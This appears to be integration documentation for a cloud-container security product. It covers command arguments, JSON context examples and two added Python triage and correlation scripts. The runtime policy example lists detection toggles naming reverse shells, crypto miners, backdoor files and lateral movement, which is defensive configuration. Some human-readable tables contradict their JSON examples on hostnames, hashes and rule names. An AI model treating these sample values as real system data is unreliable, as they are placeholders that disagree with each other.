"startTime": "2022-09-14T09:07:18.502Z"
},
"scanTime": "2023-09-26T00:20:45.054Z"
}
]
}
}

Human Readable Output#

CI Scan Information#

| ID | Hostname | Scan Time | Image ID | Image Name | Name | App |
| --- | --- | --- | --- | --- | --- | --- |
| a1 | a1 | 2023-09-26T01:46:44.579Z | sha256:a1 | img5 | hhh | a2 |
| a5 | hostname | 2023-09-26T00:20:45.054Z | a9 | a7 | a9 | test |
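The scan results above carry two different signals: complianceDistribution gives the authoritative per-severity counts, while complianceIssues (abbreviated in the example) gives the check IDs and titles. The added example below, which is not part of the integration, triages a ContainersScanResults list by escalating containers that fail the namespace-sharing checks shown above (IDs 515 and 5059) and ordering the rest by risk score; the sample data is constructed from the context example, with a third clean container added to show the ordering.

```python
from collections import Counter

# Constructed sample shaped like the PrismaCloudCompute.ContainersScanResults
# context; ids, names and images are placeholders.
SAMPLE_SCAN_RESULTS = [
    {
        "_id": "a1", "hostname": "a1", "scanTime": "2023-09-26T01:46:44.579Z",
        "collections": ["All", "Access Group"],
        "info": {
            "name": "a7", "namespace": "system", "cluster": "demo", "image": "img3",
            "complianceRiskScore": 7050000,
            "complianceDistribution": {"critical": 7, "high": 5, "low": 0, "medium": 0, "total": 12},
            "complianceIssues": [
                {"id": 515, "severity": "critical", "type": "container",
                 "title": "Do not share the process namespace"},
            ],
        },
    },
    {
        "_id": "a2", "hostname": "hostname", "agentless": True,
        "scanTime": "2023-09-26T00:20:45.054Z", "collections": ["All"],
        "info": {
            "name": "aaa", "namespace": "test", "cluster": "a5", "image": "a7",
            "complianceRiskScore": 7050000,
            "complianceDistribution": {"critical": 7, "high": 5, "low": 0, "medium": 0, "total": 12},
            "complianceIssues": [
                {"id": 5059, "severity": "critical", "type": "container",
                 "title": "Do not share the host's network namespace"},
            ],
        },
    },
    {   # constructed clean container, included to show the ordering
        "_id": "a3", "hostname": "h3", "scanTime": "2023-09-26T00:00:00.000Z",
        "collections": ["All"],
        "info": {"name": "quiet", "namespace": "prod", "cluster": "demo", "image": "img9",
                 "complianceRiskScore": 0,
                 "complianceDistribution": {"critical": 0, "high": 0, "low": 0, "medium": 0, "total": 0},
                 "complianceIssues": None},
    },
]

# Compliance check IDs from the example output that mean the container shares a
# host kernel namespace; these are escalated regardless of the risk score.
NAMESPACE_SHARING_CHECK_IDS = {515, 5059}


def triage_container(result: dict) -> dict:
    """Reduce one scan result to the fields an analyst needs to decide on it."""
    info = result.get("info") or {}
    # The distribution carries the counts; the issue list carries IDs and titles.
    distribution = info.get("complianceDistribution") or {}
    issues = info.get("complianceIssues") or []   # null in the API becomes []
    shared_ns = sorted(i["id"] for i in issues if i.get("id") in NAMESPACE_SHARING_CHECK_IDS)
    return {
        "container_id": result.get("_id"),
        "name": info.get("name"),
        "namespace": info.get("namespace"),
        "cluster": info.get("cluster"),
        "image": info.get("image"),
        "agentless": bool(result.get("agentless", False)),
        "critical_count": int(distribution.get("critical", 0)),
        "critical_titles": [i.get("title") for i in issues if i.get("severity") == "critical"],
        "namespace_sharing_checks": shared_ns,
        "risk_score": int(info.get("complianceRiskScore", 0)),
        "escalate": bool(shared_ns),
    }


def triage_scan_results(results: list) -> list:
    """Triage every container: escalations first, then highest risk score first."""
    rows = [triage_container(r) for r in results]
    rows.sort(key=lambda r: (not r["escalate"], -r["risk_score"], r["container_id"]))
    return rows


def escalation_summary(rows: list) -> Counter:
    """Number of containers per cluster that need escalation."""
    return Counter(r["cluster"] for r in rows if r["escalate"])
```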

prisma-cloud-compute-hosts-list#


Returns minimal information about all deployed hosts: hostname, distro, distro release, collections, clusters, and whether the host was scanned agentlessly.

Base Command#

prisma-cloud-compute-hosts-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| collections | A comma-separated list of collection names that you have defined in Prisma Cloud Compute. | Optional |
| account_ids | A comma-separated list of cloud account IDs. | Optional |
| clusters | A comma-separated list of clusters to filter by. | Optional |
| resource_ids | A comma-separated list of resource IDs to scope the query by. | Optional |
| region | A comma-separated list of regions to scope the query by. | Optional |
| hostname | A comma-separated list of hostnames to filter by. | Optional |
| compliance_ids | A comma-separated list of compliance IDs to filter by. | Optional |
| agentless | Whether to filter by agentless scans. Possible values are: true, false. | Optional |
| search | Term to search for. | Optional |
| limit | The maximum number of hosts to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing hosts. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Hosts._id | String | The host ID. |
| PrismaCloudCompute.Hosts.type | String | The host type. |
| PrismaCloudCompute.Hosts.hostname | String | The host hostname. |
| PrismaCloudCompute.Hosts.scanTime | Date | The host scan time. |
| PrismaCloudCompute.Hosts.Secrets | Unknown | Secrets found on the host. |
| PrismaCloudCompute.Hosts.osDistro | String | The OS distribution. |
| PrismaCloudCompute.Hosts.osDistroVersion | String | The OS distribution version. |
| PrismaCloudCompute.Hosts.osDistroRelease | String | The OS distribution release. |
| PrismaCloudCompute.Hosts.distro | String | The host distribution. |
| PrismaCloudCompute.Hosts.foundSecrets | Boolean | Whether secrets were found. |
| PrismaCloudCompute.Hosts.vulnerabilitiesCount | Number | Number of vulnerabilities found. |
| PrismaCloudCompute.Hosts.complianceIssuesCount | Number | Number of compliance issues found. |
| PrismaCloudCompute.Hosts.vulnerabilityRiskScore | Number | The host's vulnerability risk score. |
| PrismaCloudCompute.Hosts.complianceRiskScore | Number | The host's compliance risk score. |
| PrismaCloudCompute.Hosts.riskFactors | Unknown | Risk factors for the host. |
| PrismaCloudCompute.Hosts.collections | Unknown | The collections the host belongs to. |
| PrismaCloudCompute.Hosts.agentless | Boolean | Whether the host was scanned agentlessly. |

Command example#

!prisma-cloud-compute-hosts-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"Hosts": [
{
"Secrets": null,
"_id": "a9",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"binaries": null,
"cloudMetadata": {},
"collections": [
"All"
],
"complianceDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"complianceIssues": null,
"complianceIssuesCount": 0,
"complianceRiskScore": 0,
"creationTime": "0001-01-01T00:00:00Z",
"distro": "Ubuntu 20.04.4 LTS",
"err": "",
"files": null,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "0001-01-01T00:00:00Z",
"foundSecrets": null,
"history": null,
"hostname": "a9",
"hosts": null,
"image": {
"created": "0001-01-01T00:00:00Z"
},
"installedProducts": {},
"instances": null,
"isARM64": false,
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "",
"osDistroRelease": "focal",
"osDistroVersion": "",
"packageCorrelationDone": false,
"packageManager": false,
"packages": null,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": null,
"repoTag": null,
"riskFactors": null,
"scanID": 0,
"scanTime": "0001-01-01T00:00:00Z",
"secretScanMetrics": {},
"startupBinaries": null,
"tags": null,
"trustStatus": "",
"type": "",
"vulnerabilities": null,
"vulnerabilitiesCount": 0,
"vulnerabilityDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"vulnerabilityRiskScore": 0,
"wildFireUsage": null
},
{
"Secrets": null,
"_id": "a4",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"binaries": null,
"cloudMetadata": {},
"collections": [
"All"
],
"complianceDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"complianceIssues": null,
"complianceIssuesCount": 0,
"complianceRiskScore": 0,
"creationTime": "0001-01-01T00:00:00Z",
"distro": "Ubuntu 20.04.4 LTS",
"err": "",
"files": null,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "0001-01-01T00:00:00Z",
"foundSecrets": null,
"history": null,
"hostname": "hostname3",
"hosts": null,
"image": {
"created": "0001-01-01T00:00:00Z"
},
"installedProducts": {},
"instances": null,
"isARM64": false,
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "",
"osDistroRelease": "focal",
"osDistroVersion": "",
"packageCorrelationDone": false,
"packageManager": false,
"packages": null,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": null,
"repoTag": null,
"riskFactors": null,
"scanID": 0,
"scanTime": "0001-01-01T00:00:00Z",
"secretScanMetrics": {},
"startupBinaries": null,
"tags": null,
"trustStatus": "",
"type": "",
"vulnerabilities": null,
"vulnerabilitiesCount": 0,
"vulnerabilityDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"vulnerabilityRiskScore": 0,
"wildFireUsage": null
}
]
}
}

Human Readable Output#

Hosts Information#

| ID | Hostname | Scan Time | Distro | Distro Release |
| --- | --- | --- | --- | --- |
| a9 | a9 | 0001-01-01T00:00:00Z | Ubuntu 20.04.4 LTS | focal |
| a4 | hostname1 | 0001-01-01T00:00:00Z | Ubuntu 20.04.4 LTS | focal |

prisma-cloud-compute-runtime-container-audit-events-list#


Retrieves all container audit events when a runtime sensor such as process, network, file system, or system call detects an activity that deviates from the predictive model.

Base Command#

prisma-cloud-compute-runtime-container-audit-events-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| collections | A comma-separated list of collection names that you have defined in Prisma Cloud Compute. | Optional |
| account_ids | A comma-separated list of cloud account IDs. | Optional |
| clusters | A comma-separated list of cluster names. | Optional |
| namespaces | A comma-separated list of namespace names. | Optional |
| resource_ids | A comma-separated list of resource IDs. | Optional |
| region | A comma-separated list of cloud region names. | Optional |
| audit_id | A comma-separated list of audit event IDs. | Optional |
| profile_id | A comma-separated list of runtime profile IDs. | Optional |
| image_name | A comma-separated list of image names. | Optional |
| container | A comma-separated list of container names. | Optional |
| container_id | A comma-separated list of container IDs. | Optional |
| type | A comma-separated list of audit event types. | Optional |
| effect | A comma-separated list of audit event effects. | Optional |
| user | A comma-separated list of users. | Optional |
| os | A comma-separated list of operating systems. | Optional |
| app | A comma-separated list of applications. | Optional |
| hostname | A comma-separated list of hostnames. | Optional |
| search | Term to search for. | Optional |
| limit | The maximum number of audit events to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing audit events. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.RuntimeContainerAuditEvents.os | String | The operating system of the container. |
| PrismaCloudCompute.RuntimeContainerAuditEvents._id | String | The audit event ID. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.time | Date | The audit event time. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.hostname | String | The hostname. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.fqdn | String | The audited event container's fully qualified domain name. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.user | String | The audited event user. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.type | String | The audit event type. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.containerId | String | The container ID. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.containerName | String | The container name. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.imageName | String | The image name. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.imageId | String | The image ID. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.namespace | String | The namespace. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.effect | String | The audit event effect. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.ruleName | String | The rule name. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.msg | String | The audit event message. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.profileId | String | The profile ID. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.pid | Number | The process ID. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.processPath | String | The process path. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.collections | Unknown | The collections. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.attackType | String | The attack type. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.count | Number | The count of audit events. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.container | Boolean | Whether the audit event was from a container. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.severity | String | The severity of the audit event. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.region | String | The region of the container. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.accountID | String | The account ID of the container. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.cluster | String | The cluster of the container. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.filepath | String | The file path of the audit event. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.md5 | String | The MD5 hash of the file. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.command | String | The command of the audit event. |
| PrismaCloudCompute.RuntimeContainerAuditEvents.provider | String | The provider of the container. |

Command example#

!prisma-cloud-compute-runtime-container-audit-events-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"RuntimeContainerAuditEvents": [
{
"_id": "a9",
"accountID": "11",
"attackType": "malwareFileFeed",
"cluster": "pc-demo-eks-ii",
"collections": [
"All"
],
"command": "cmd",
"container": true,
"containerId": "c2",
"containerName": "python-server-app",
"count": 1,
"effect": "block",
"filepath": "f5",
"fqdn": "",
"hostname": "hostname4",
"imageId": "sha256:r4",
"imageName": "r6",
"md5": "r8",
"msg": "msg6",
"namespace": "default",
"os": "Ubuntu 22.04.2 LTS",
"pid": 6283,
"processPath": "/usr/bin/git",
"profileId": "sha256:r4_default_pc-demo-eks-ii",
"provider": "aws",
"region": "eu-central-1",
"ruleName": "ii-pc-advanced-demo-eks-block",
"severity": "high",
"time": "2023-08-20T12:44:45.128Z",
"type": "filesystem",
"user": "root"
},
{
"_id": "b5",
"accountID": "s4",
"attackType": "malwareFileFeed",
"cluster": "pc-github",
"collections": [
"All"
],
"command": "cmd",
"container": true,
"containerId": "t6",
"containerName": "na6",
"count": 1,
"effect": "block",
"filepath": "f5",
"fqdn": "",
"hostname": "n7",
"imageId": "sha256:n6",
"imageName": "img6",
"md5": "r8",
"msg": "msg6",
"namespace": "default",
"os": "Ubuntu 22.04.3 LTS",
"pid": 25597,
"processPath": "/usr/bin/git",
"profileId": "sha256:n6_default_pc-github",
"provider": "aws",
"region": "us-east-2",
"ruleName": "ii-pc-advanced-demo-eks-block",
"severity": "high",
"time": "2023-08-20T12:45:45.405Z",
"type": "filesystem",
"user": "root"
}
]
}
}

Human Readable Output#

Runtime Container Audit Events Information#

| ID | Hostname | Container Name | Image Name | Effect | Type | Attack Type | Severity |
| --- | --- | --- | --- | --- | --- | --- | --- |
| a9 | hostname4 | python-server-app | r6 | block | filesystem | malwareFileFeed | high |
| b5 | n7 | na6 | img6 | block | filesystem | malwareFileFeed | high |

prisma-cloud-compute-archive-audit-incident#


Acknowledges an incident and moves it to an archived state.

Base Command#

prisma-cloud-compute-archive-audit-incident

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| incident_id | Incident ID. | Required |
| action | Action for the command. archive - incident will be archived, unarchive - incident will be unarchived. Possible values are: archive, unarchive. Default is archive. | Optional |

Command example#

!prisma-cloud-compute-archive-audit-incident incident_id="1111"

Human Readable Output#

Incident 1111 was successfully archived

prisma-cloud-compute-runtime-host-audit-events-list#


Retrieves the runtime host audit events.

Base Command#

prisma-cloud-compute-runtime-host-audit-events-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| clusters | A comma-separated list of cluster names. | Optional |
| namespaces | A comma-separated list of namespace names. | Optional |
| audit_id | A comma-separated list of audit event IDs. | Optional |
| profile_id | A comma-separated list of runtime profile IDs. | Optional |
| image_name | A comma-separated list of image names. | Optional |
| container | A comma-separated list of container names. | Optional |
| container_id | A comma-separated list of container IDs. | Optional |
| type | A comma-separated list of audit event types. | Optional |
| effect | A comma-separated list of audit event effects. | Optional |
| user | A comma-separated list of users. | Optional |
| os | A comma-separated list of operating systems. | Optional |
| app | A comma-separated list of applications. | Optional |
| hostname | A comma-separated list of hostnames. | Optional |
| time | Filters by audit time. | Optional |
| attack_type | Filters by runtime audit attack type. | Optional |
| limit | The maximum number of audit events to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing audit events. Default is 0. | Optional |
| all_results | Whether to retrieve all results; the "limit" argument is then ignored. This may return a large number of results and slow down the command, so it is not recommended for frequent use. Possible values are: true, false. Default is false. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.RuntimeHostAuditEvents._id | String | The audit event ID. |
| PrismaCloudCompute.RuntimeHostAuditEvents.accountID | String | The account ID of the container. |
| PrismaCloudCompute.RuntimeHostAuditEvents.app | String | The app. |
| PrismaCloudCompute.RuntimeHostAuditEvents.attackType | String | The attack type. |
| PrismaCloudCompute.RuntimeHostAuditEvents.attackTechniques | Unknown | Attack techniques of the event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.collections | Unknown | The collections. |
| PrismaCloudCompute.RuntimeHostAuditEvents.command | String | The command of the audit event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.count | Number | The count of audit events. |
| PrismaCloudCompute.RuntimeHostAuditEvents.effect | String | The audit event effect. |
| PrismaCloudCompute.RuntimeHostAuditEvents.filepath | String | The file path of the audit event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.fqdn | String | The fully qualified domain name used in the audit event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.events.hostname | String | The hostname on which the command was invoked. |
| PrismaCloudCompute.RuntimeHostAuditEvents.md5 | String | The MD5 hash of the file. |
| PrismaCloudCompute.RuntimeHostAuditEvents.msg | String | The audit event message. |
| PrismaCloudCompute.RuntimeHostAuditEvents.pid | Number | The process ID. |
| PrismaCloudCompute.RuntimeHostAuditEvents.processPath | String | The process path. |
| PrismaCloudCompute.RuntimeHostAuditEvents.profileId | String | The profile ID. |
| PrismaCloudCompute.RuntimeHostAuditEvents.provider | String | The provider of the container. |
| PrismaCloudCompute.RuntimeHostAuditEvents.region | String | The region of the container. |
| PrismaCloudCompute.RuntimeHostAuditEvents.resourceID | String | The resource ID of the event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.ruleName | String | The rule name. |
| PrismaCloudCompute.RuntimeHostAuditEvents.severity | String | The severity of the audit event. |
| PrismaCloudCompute.RuntimeHostAuditEvents.time | Date | The audit event time. |
| PrismaCloudCompute.RuntimeHostAuditEvents.type | String | The audit event type. |
| PrismaCloudCompute.RuntimeHostAuditEvents.user | String | The audited event user. |

Command example#

!prisma-cloud-compute-runtime-host-audit-events-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"RuntimeHostAuditEvents": {
"_id": "2222",
"accountID": "3333",
"app": "test.amazon-test-agent.amazon-test-agent",
"attackType": "unknownOriginBinary",
"collections": [
"BDausses_Collection",
"3333",
"testk"
],
"command": "/usr/bin/python3.6",
"count": 1,
"effect": "alert",
"filepath": "/var/log/amazon/test/patch-baseline-operations/simplejson/_speedups.so",
"fqdn": "",
"hostname": "test.ec2.internal",
"md5": "1aaaaa",
"msg": "/usr/bin/python3.6, which is not a known OS distribution package manager wrote the binary /var/log/amazon/test/patch-baseline-operations/simplejson/_speedups.so. MD5: 1aaaaa. Command: python3",
"pid": 4808,
"processPath": "/usr/bin/python3.6",
"profileId": "test.ec2.internal",
"provider": "aws",
"region": "us-east-1",
"resourceID": "i-test",
"ruleName": "Windows File System Check",
"severity": "high",
"time": "2024-01-17T09:42:56.679Z",
"type": "filesystem",
"user": "root"
}
}
}

Human Readable Output#

Runtime Host Audit Events Information#

| ID | Hostname | User | Type | AttackType | Message | Severity | Effect |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 2222 | ip-10-10-10-76.ec2.internal | root | filesystem | unknownOriginBinary | /usr/bin/python3.6, which is not a known OS distribution package manager wrote the binary /var/log/amazon/ssm/patch-baseline-operations/simplejson/_speedups.so. MD5: 038ebdb3fb23a04fc288b2eb01a7da70. Command: python3 | high | alert |
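Both runtime audit commands (prisma-cloud-compute-runtime-container-audit-events-list and prisma-cloud-compute-runtime-host-audit-events-list) return filesystem events carrying an md5 and a filepath, which is the pivot an analyst uses to tell one spreading file from many unrelated alerts; note that the container example above holds two events with the same md5 and filepath in two different clusters, and that the host command's context example is a single object rather than a list. The following is an added example, not part of the integration's own code, that normalises both shapes and groups the events by file; the sample events are constructed from the two context examples above.

```python
from collections import defaultdict

# Constructed samples shaped like the RuntimeContainerAuditEvents and
# RuntimeHostAuditEvents context examples (placeholder values).
SAMPLE_CONTAINER_EVENTS = [
    {"_id": "a9", "cluster": "pc-demo-eks-ii", "hostname": "hostname4",
     "containerName": "python-server-app", "attackType": "malwareFileFeed",
     "effect": "block", "type": "filesystem", "severity": "high",
     "filepath": "f5", "md5": "r8", "processPath": "/usr/bin/git",
     "user": "root", "time": "2023-08-20T12:44:45.128Z"},
    {"_id": "b5", "cluster": "pc-github", "hostname": "n7",
     "containerName": "na6", "attackType": "malwareFileFeed",
     "effect": "block", "type": "filesystem", "severity": "high",
     "filepath": "f5", "md5": "r8", "processPath": "/usr/bin/git",
     "user": "root", "time": "2023-08-20T12:45:45.405Z"},
]
# The host command's context example is a single object rather than a list.
SAMPLE_HOST_EVENTS = {
    "_id": "2222", "hostname": "test.ec2.internal", "attackType": "unknownOriginBinary",
    "effect": "alert", "type": "filesystem", "severity": "high",
    "filepath": "/var/log/amazon/test/patch-baseline-operations/simplejson/_speedups.so",
    "md5": "1aaaaa", "processPath": "/usr/bin/python3.6",
    "user": "root", "time": "2024-01-17T09:42:56.679Z",
}


def as_event_list(ctx) -> list:
    """A context path holds one object for a single result and a list otherwise."""
    if ctx is None:
        return []
    return ctx if isinstance(ctx, list) else [ctx]


def correlate_file_events(container_ctx, host_ctx) -> list:
    """Group filesystem audit events by (md5, filepath) across both event kinds.

    One hash surfacing in several clusters or hosts is one campaign rather than
    several unrelated alerts, and a group in which nothing was blocked needs a
    human to look at it.
    """
    groups = defaultdict(lambda: {"scopes": set(), "event_ids": [],
                                  "effects": set(), "attack_types": set(),
                                  "first_seen": None, "last_seen": None})
    for source, ctx in (("container", container_ctx), ("host", host_ctx)):
        for event in as_event_list(ctx):
            if event.get("type") != "filesystem" or not event.get("md5"):
                continue  # only file events carry a hash to pivot on
            key = (event["md5"], event.get("filepath", ""))
            g = groups[key]
            # containers are scoped by cluster, hosts by hostname
            g["scopes"].add(event.get("cluster") or event.get("hostname"))
            g["event_ids"].append(f"{source}:{event.get('_id')}")
            g["effects"].add(event.get("effect"))
            g["attack_types"].add(event.get("attackType"))
            t = event.get("time")
            if t:  # ISO-8601 strings in one format compare correctly as text
                g["first_seen"] = min(filter(None, [g["first_seen"], t]))
                g["last_seen"] = max(filter(None, [g["last_seen"], t]))
    rows = []
    for (md5, filepath), g in groups.items():
        rows.append({
            "md5": md5, "filepath": filepath,
            "scopes": sorted(g["scopes"]), "event_ids": g["event_ids"],
            "effects": sorted(g["effects"]), "attack_types": sorted(g["attack_types"]),
            "first_seen": g["first_seen"], "last_seen": g["last_seen"],
            "spread": len(g["scopes"]) > 1,            # same file in >1 cluster/host
            "unblocked": "block" not in g["effects"],  # only alerted, never blocked
        })
    # spreading files first, then files that were never blocked
    rows.sort(key=lambda r: (not r["spread"], not r["unblocked"], r["md5"]))
    return rows


if __name__ == "__main__":
    for row in correlate_file_events(SAMPLE_CONTAINER_EVENTS, SAMPLE_HOST_EVENTS):
        print(row["md5"], row["scopes"], "spread" if row["spread"] else "single",
              "unblocked" if row["unblocked"] else "blocked")
```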

prisma-cloud-compute-runtime-container-policy-list#


Retrieves the runtime policy for containers protected by Defender. A policy consists of ordered rules.

Base Command#

prisma-cloud-compute-runtime-container-policy-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| all_results | Whether to retrieve all results; the "limit" argument is then ignored. This may return a large number of results and slow down the command, so it is not recommended for frequent use. Possible values are: true, false. Default is false. | Optional |
| limit | The maximum number of results to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing results. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Policies.RuntimeContainerPolicy.name | String | The name of the runtime policy rule. |
| PrismaCloudCompute.Policies.RuntimeContainerPolicy.owner | String | The owner of the runtime policy rule. |
| PrismaCloudCompute.Policies.RuntimeContainerPolicy.modified | Date | The last modified time of the runtime policy rule. |

Command example#

!prisma-cloud-compute-runtime-container-policy-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"RuntimeContainerPolicy": {
"advancedProtectionEffect": "alert",
"cloudMetadataEnforcementEffect": "alert",
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#53EB1C",
"containers": [
"*"
],
"functions": [
"*"
],
"hosts": [
"test-worker01",
"test-master02",
"test-worker02",
"test-worker03"
],
"images": [
"test/mirrored*",
"test/hyperkube*"
],
"labels": [
"*"
],
"modified": "2024-01-12T16:35:54.402Z",
"name": "test-collection-test",
"namespaces": [
"*"
],
"owner": "test1@paloaltonetworks.com",
"prisma": false,
"system": false
}
],
"dns": {
"defaultEffect": "alert",
"disabled": true,
"domainList": {
"allowed": [],
"denied": [],
"effect": "disable"
}
},
"filesystem": {
"allowedList": [],
"backdoorFilesEffect": "alert",
"defaultEffect": "alert",
"deniedList": {
"effect": "disable",
"paths": []
},
"disabled": false,
"encryptedBinariesEffect": "alert",
"newFilesEffect": "alert",
"suspiciousELFHeadersEffect": "alert"
},
"kubernetesEnforcementEffect": "alert",
"modified": "2024-01-12T16:52:25.358Z",
"name": "test-monitor-test",
"network": {
"allowedIPs": [
"127.0.0.1"
],
"defaultEffect": "alert",
"deniedIPs": [],
"deniedIPsEffect": "disable",
"disabled": false,
"listeningPorts": {
"allowed": [],
"denied": [],
"effect": "disable"
},
"modifiedProcEffect": "alert",
"outboundPorts": {
"allowed": [
{
"deny": false,
"end": 6443,
"start": 6443
}
],
"denied": [],
"effect": "disable"
},
"portScanEffect": "alert",
"rawSocketsEffect": "alert"
},
"owner": "test2@paloaltonetworks.com",
"previousName": "",
"processes": {
"allowedList": [],
"checkParentChild": true,
"cryptoMinersEffect": "alert",
"defaultEffect": "alert",
"deniedList": {
"effect": "disable",
"paths": []
},
"disabled": false,
"lateralMovementEffect": "alert",
"modifiedProcessEffect": "alert",
"reverseShellEffect": "alert",
"suidBinariesEffect": "disable"
},
"skipExecSessions": true,
"wildFireAnalysis": "alert"
}
}
}
}

Human Readable Output#

Runtime Container Policy Events Information#

| Name | Owner | Modified |
| --- | --- | --- |
| rke-monitor-rule | avega@paloaltonetworks.com | 2024-01-12T16:52:25.358Z |

General Note:#

  • Do not use the Reset last run button, as it will create duplicate incidents in the instance.
  • If you pressed the Reset last run button and got duplicate incidents, run the prisma-cloud-compute-unstuck-fetch-stream command.